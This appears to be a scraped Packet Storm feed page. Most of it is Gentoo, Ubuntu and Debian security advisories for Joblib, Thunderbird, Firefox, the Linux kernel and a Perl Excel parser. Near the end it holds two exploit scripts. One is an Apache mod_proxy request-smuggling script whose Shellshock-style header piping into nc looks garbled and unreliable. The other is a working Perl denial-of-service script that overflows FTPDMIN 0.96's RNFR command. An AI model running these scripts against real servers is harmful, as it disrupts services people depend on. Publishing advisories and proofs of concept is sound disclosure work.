Gentoo Linux Security Advisory 202401-1 - A vulnerability has been found in Joblib which allows for arbitrary code execution. Versions greater than or equal to 1.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Joblib: Arbitrary Code Execution  
     Date: January 02, 2024  
     Bugs: #873151  
       ID: 202401-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in Joblib which allows for arbitrary code  
execution.

Background  
==========

Joblib is a set of tools to provide lightweight pipelining in Python. In  
particular:

1. transparent disk-caching of functions and lazy re-evaluation (memoize  
pattern)  
2. easy simple parallel computing

Joblib is optimized to be fast and robust on large data in particular  
and has specific optimizations for numpy arrays.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-python/joblib  < 1.2.0       >= 1.2.0

Description  
===========

A vulnerability has been discovered in Joblib. Please review the CVE  
identifier referenced below for details.

Impact  
======

Joblib is vulnerable to arbitrary code execution via the pre_dispatch  
flag in Parallel() class due to the eval() statement.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Joblib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/joblib-1.2.0"

References  
==========

[ 1 ] CVE-2022-21797  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21797

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-01

Complete comprehensive archive of all 1,863 exploits added to Packet Storm in 2023.

Packet Storm New Exploits For 2023

This archive contains all of the 74 exploits added to Packet Storm in December, 2023.

Packet Storm New Exploits For December, 2023

Ubuntu Security Notice 6563-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. Marcus Brinkmann discovered that Thunderbird did not properly parse a PGP/MIME payload that contains digitally signed text. An attacker could potentially exploit this issue to spoof an email message.

    =========================================================================Ubuntu Security Notice USN-6563-1January 02, 2024thunderbird vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code.(CVE-2023-6857, CVE-2023-6858,CVE-2023-6859, CVE-2023-6861, CVE-2023-6862, CVE-2023-6863, CVE-2023-6864)Marcus Brinkmann discovered that Thunderbird did not properly parse a PGP/MIMEpayload that contains digitally signed text. An attacker could potentiallyexploit this issue to spoof an email message. (CVE-2023-50762)Marcus Brinkmann discovered that Thunderbird did not properly compare thesignature creation date with the message date and time when using digitallysigned S/MIME email message. An attacker could potentially exploit thisissue to spoof date and time of an email message. (CVE-2023-50761)DoHyun Lee discovered that Thunderbird did not properly manage memory whenused on systems with the Mesa VM driver. An attacker could potentiallyexploit this issue to execute arbitrary code. (CVE-2023-6856)Andrew Osmond discovered that Thunderbird did not properly validate thetextures produced by remote decoders. An attacker could potentially exploitthis issue to escape the sandbox. (CVE-2023-6860)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:  thunderbird                     1:115.6.0+build2-0ubuntu0.23.10.1Ubuntu 23.04:  thunderbird                     1:115.6.0+build2-0ubuntu0.23.04.1Ubuntu 22.04 LTS:  thunderbird                     1:115.6.0+build2-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:115.6.0+build2-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6563-1  CVE-2023-50761, CVE-2023-50762, CVE-2023-6856, CVE-2023-6857,  CVE-2023-6858, CVE-2023-6859, CVE-2023-6860, CVE-2023-6861,  CVE-2023-6862, CVE-2023-6863, CVE-2023-6864Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:115.6.0+build2-0ubuntu0.23.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.6.0+build2-0ubuntu0.23.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.6.0+build2-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.6.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6563-1

Ubuntu Security Notice 6562-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. DoHyun Lee discovered that Firefox did not properly manage memory when used on systems with the Mesa VM driver. An attacker could potentially exploit this issue to execute arbitrary code.

    =========================================================================Ubuntu Security Notice USN-6562-1January 02, 2024firefox vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code.(CVE-2023-6865,CVE-2023-6857, CVE-2023-6858, CVE-2023-6859, CVE-2023-6866, CVE-2023-6867,CVE-2023-6861, CVE-2023-6869, CVE-2023-6871, CVE-2023-6872, CVE-2023-6863,CVE-2023-6864, CVE-2023-6873)DoHyun Lee discovered that Firefox did not properly manage memory when usedon systems with the Mesa VM driver. An attacker could potentially exploitthis issue to execute arbitrary code. (CVE-2023-6856)George Pantela and Hubert Kario discovered that Firefox using multiple NSSNIST curves which were susceptible to a side-channel attack known as"Minerva". An attacker could potentially exploit this issue to obtainsensitive information. (CVE-2023-6135)Andrew Osmond discovered that Firefox did not properly validate the texturesproduced by remote decoders. An attacker could potentially exploit thisissue to escape the sandbox. (CVE-2023-6860)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         121.0+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6562-1  CVE-2023-6135, CVE-2023-6856, CVE-2023-6857, CVE-2023-6858,  CVE-2023-6859, CVE-2023-6860, CVE-2023-6861, CVE-2023-6863,  CVE-2023-6864, CVE-2023-6865, CVE-2023-6866, CVE-2023-6867,  CVE-2023-6869, CVE-2023-6871, CVE-2023-6872, CVE-2023-6873Package Information:  https://launchpad.net/ubuntu/+source/firefox/121.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6562-1

Debian Linux Security Advisory 5593-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5593-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
January 01, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-6531 CVE-2023-6622 CVE-2023-6817 CVE-2023-6931  
                 CVE-2023-51779 CVE-2023-51780 CVE-2023-51781 CVE-2023-51782

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-6531

    Jann Horn discovered a use-after-free flaw due to a race condition  
    problem when the unix garbage collector's deletion of a SKB races  
    with unix_stream_read_generic() on the socket that the SKB is  
    queued on.

CVE-2023-6622

    Xingyuan Mo discovered a flaw in the netfilter subsystem which may  
    result in denial of service or privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6817

    Xingyuan Mo discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6931

    Budimir Markovic reported a heap out-of-bounds write vulnerability  
    in the Linux kernel's Performance Events system which may result in  
    denial of service or privilege escalation.

CVE-2023-51779

    It was discovered that a race condition in the Bluetooth subsystem  
    in the bt_sock_ioctl handling may lead to a use-after-free.

CVE-2023-51780

    It was discovered that a race condition in the ATM (Asynchronous  
    Transfer Mode) subsystem may lead to a use-after-free.

CVE-2023-51781

    It was discovered that a race condition in the Appletalk subsystem  
    may lead to a use-after-free.

CVE-2023-51782

    It was discovered that a race condition in the Amateur Radio X.25  
    PLP (Rose) support may lead to a use-after-free.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.69-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWSuDJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q7/g//Ski3EY0dL0SNhIWCSVOA01f4rZbW8e+65GpQofJtckBb2Wk1ZyMb+eLv  
U5aRfscn7DC2J0BiX+/JjaboTx880WcUQw5csbSzb2bEGhsHBwHkCG31qaTs5ekG  
XH654gBja/FmGZOvQ+YwoglDMCbCiSrUs7fwe3kPhlr3XRHs2ZdezKrOQ3m2bo7g  
xnA7UwB+5xwbbnweYkmKxtowM+x4XUDsr43/YR+mbeULzprGQGbyxsi8txKJQ8d+  
xqyxCl5zki3dF/baBhBLPMH26GUs6fGsplhht9ecUcKXiNeyYLBX6Aepb4YDEgKN  
o0tBDPVundFPxyQzr8qMfdB0w6+4U2z+QavV/OCziNIKXbnrNUMpjF6Pks+geneY  
R+ut1KWHVkOJsAgI3mGrLd+tjPSEsdUB2EJhlFWpF9XJnBD3KV9xPVOBN3ZjL1+o  
t/ow/5XV+LZTihUQ37stcJRnl5U1CGWlBWbUonc++eGbCAvFNaV6gTfADWyz+/6W  
z5eKFZpj678AFr5RbkgF2earJUT0iC3vgtKMTiEsxNoRMZgVOu8iiekX+gpWBkdt  
2w+dAAu8VFixQ5/Sl8LDYCFkP8xrtf31XiNBsrMZzxJDfMtNYMi++iQXSW8LyoL/  
JqbEQibQU57ls29SbvoweKCnK1GgBfhrqqGAk7/Pnax0yuK4z4M=9GI7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5593-1

Debian Linux Security Advisory 5592-1 - It was discovered that missing input sanitising in libspreadsheet-parseexcel-perl, a Perl module to access information from Excel Spreadsheets, may result in the execution of arbitrary commands if a specially crafted document file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5592-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 30, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libspreadsheet-parseexcel-perlCVE ID         : CVE-2023-7101Debian Bug     : 1059450It was discovered that missing input sanitising inlibspreadsheet-parseexcel-perl, a Perl module to access information fromExcel Spreadsheets, may result in the execution of arbitrary commands ifa specially crafted document file is processed.For the oldstable distribution (bullseye), this problem has been fixedin version 0.6500-1.1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 0.6500-4~deb12u1.We recommend that you upgrade your libspreadsheet-parseexcel-perl packages.For the detailed security status of libspreadsheet-parseexcel-perlplease refer to its security tracker page at:https://security-tracker.debian.org/tracker/libspreadsheet-parseexcel-perlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWQQZFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TiShAAnw9dvwoVVB0rw6nbZGYyNhGsXStNBiN+VFkhIrhE3mfLpiDyFduAOEc0HqA/SgLUC5hlK45CkubvRzOggFOEOakwGRGawAHRbtOW64ScyFTCsG7j6RL0z05mDqbmlDekey9LJQ/i6/AviZ4NtNjZ8zebucG2YHRj0j0zplqOyRdhxIud4hOSnH50glkQRlyZz+vOtCHDncv5otlugrfk8ZS/y3+lSMQ3QtvgGxkSlgrTkK81OH0CPn7r0PJ/XGVN5Cb/DY8yWaTDwbLjwSLWKNFC5Qj9HgkQB8utUwGaerkoxdn9JG4JQTjhadu6umQ+VGgUjfVBxtlYBO3kTXODvsDXAb6qoHzce6jrBoYCwaTzAVpaw1ivRKCUAOSzIDHnwJQzA6nEUlDN7fY9qyb1BeQHljFTFh57rvmPCrsQtzc/mlPQyC5s//j06f+FBpnAqKlpdr//U+VNehiv2dmls1coL5xWo68j6wUDOOcahy8OssOlJyvSkS6n4QzwfsKXTef/e/5kbDDhECiO2zLtl1AtsC6KCYZ76kVpFj2iRAIEY9JFTvNG8CJPpodmlPUSjtF91A5AJBqXLKyjQQHK6ufB4Au+pnq+EMcgd+Ql8w9GAU9VekvbQZCA4hPD7uhEQ3DnQwQ3qnRDaD+R3ZIbWyuWzqbVoCWT/DIN5DYUXDg=Yl6V-----END PGP SIGNATURE-----

Debian Security Advisory 5592-1

Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information.

Stegano 0.11.3

Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow for an HTTP request smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution.

    # Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through# 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected# when mod_proxy is enabled along with some form of RewriteRule or# ProxyPassMatch in which a non-specific pattern matches some portion of the# user-supplied request-target (URL) data and is then re-inserted into the# proxied request-target using variable substitution. For example, something# like: RewriteEngine on RewriteRule "^/here/(.*)" "# http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/# http://example.com:8080/ Request splitting/smuggling could result in bypass# of access controls in the proxy server, proxying unintended URLs to# existing origin servers, and cache poisoning. Users are recommended to# update to at least version 2.4.56 of Apache HTTP Server.import requestsdef send_exploit(proxy_url):    exploit_headers = {        'User-Agent': '() { :; }; /bin/echo -e "GET /here/../here HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /nonexistent HTTP/1.1\r\nHost: www.example.com\r\n\r\n" | nc example.com 80',        'Connection': 'close'    }    exploit_url = 'http://example.com/here/../here'    response = requests.get(exploit_url, headers=exploit_headers, proxies={'http': proxy_url, 'https': proxy_url})    print(response.text)# Usagesend_exploit('http://localhost:8080')

Apache 2.4.55 mod_proxy HTTP Request Smuggling

FTPDMIN version 0.96 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: FTPDMIN 0.96 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 2024-01-01  
# Vendor Homepage: https://www.sentex.ca/~mwandel/ftpdmin/  
# Download to demo:  
https://drive.google.com/file/d/1CpfvaJbJVxR3HPWvcxIVipTaTj7RAaLd/view?usp=sharing  
# Notification vendor: Yes reported  
# Tested Version: FTPDMIN 0.96  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=q-CVJfYdd-g

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2  
and 3 (English).  
#For this exploit I have tried several strategies to increase reliability  
and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via  
FTP command RNFR.  
#The following request sends a large amount of data to the FTP server to  
process across command RNFR, the server will crash as soon as it is  
received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash  
the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

    intro();  
    main();

    print "[+] Exploiting... \n";

    my $buf = "\x41"x269;  
    my $point = "\x45\x2a\x42\x7b";  
    my $buf2 = "\x41"x126;

    my $payload = "RNFR ".$buf . $point . $buf2;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Can't connect to  
server: $@";

    $ftp->login("anonymous",'anonymous');

    $ftp->quot($payload);

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

   sub intro {  
      print "***************************************************\n";  
      print "*         FTPDMIN 0.96 - Denied of Service        *\n";  
      print "*                                                 *\n";  
      print "*            Coded by Fernando Mengali            *\n";  
      print "*                                                 *\n";  
      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";  
      print "*                                                 *\n";  
      print "***************************************************\n";  
  }

  sub main {

      our ($ip) = @ARGV;

      unless (defined($ip)) {

        print "             \nUsage: $0 <ip>                   \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated